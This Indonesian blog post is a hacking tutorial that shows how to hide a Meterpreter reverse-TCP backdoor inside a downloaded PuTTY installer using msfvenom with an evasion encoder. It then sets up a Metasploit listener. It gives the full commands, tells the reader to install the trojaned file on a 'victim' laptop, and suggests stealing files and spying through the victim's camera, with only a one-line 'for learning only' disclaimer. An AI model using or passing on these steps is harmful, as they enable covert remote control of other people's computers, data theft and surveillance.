Assalamualaikum.Wrb.
Hallo kawan selamat datang di blog Networking Indonesia yaitu blog yang membahas seputar IT di Indonesia dan di dunia.Pada postingan kali ini saya akan membahas dunia Hacking yapp yaitu trick Backdooring File Exe dengan msfvenom,yang nantinya file exe yang sudah di kasih backdoor akan di pasangkan ke laptop korban.
PERINGATAN ini Hanya Untuk Pembelajaran Semata Jangan di Salah Gunakan Pada Tindak Kejahatan.
Persyaratan :
- Adanya file exe.
- Adanya korban
- Adanya msfvenom
Oke langsung kita masuk ke tutorialnya :
Pertama kita akan membuat executable backdoored yang nantinya akan disisipkan backdoor.Jadi hal pertama yang di lakukan adalah kita download mentahannya,disini saya gunakan putty client,bisa download dengan terminal disni:wget http://the.earth.li/-sgtatham/putty/latest/x86/putty.exe.
Pada tahap ini kita akan menyamarkan backdor dengan cara menaruhnya di file installer putty dengan perintah : msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=172.16.10.20 lport=8080 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyXploit.exe.
Penjelasan :
-a merupakan architecture yang digunakan.
--platform adalah payload yang dibuat.
-x posisi atau letak file exe yang hendak di injeksi.
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikan payload.
-p perintah untuk menentukan tipe payload
windows/meterpreter/reverse_tcp adalah tipe payload yang digunakan
-lhost adalah alamat IP kita
-lport adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
-e untuk memilih encoder yang digunakan x86/shikata_ga_nai adalah encoder yang digunakan
-i iterations (jumlah encode payload)
-f format output
-o output hasil file yang telah di injeksi ( backdoor result ).
Nah disni saya sudah memasang file exe putty yang sudah disisipkan backdoor ke si laptop korban,dan kita jalankan puttynya.
Kita akan membuat akan masuk ke metasploit dengan perintah msfconsole,lalu masukan perintah :
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost (ip address)
- set lport (port yang sudah di tentukan)
- exploit
Jika korban sudah menjalankan puttynya kita masukan perintah sysinfo untuk mengetahui informasi tentang laptop korban.Dan jika kalian sudah berhasil maka kalian bisa melakukan apapun yang kalian mau mulai dari ambil file korban,streaming lewat kamera korban dan banyak lagi.
Dahh selesai cukup mudah bukan hehe,semoga bermanfaat sekian dari saya Wassalamualaikum.Wrb.
No comments:
Post a Comment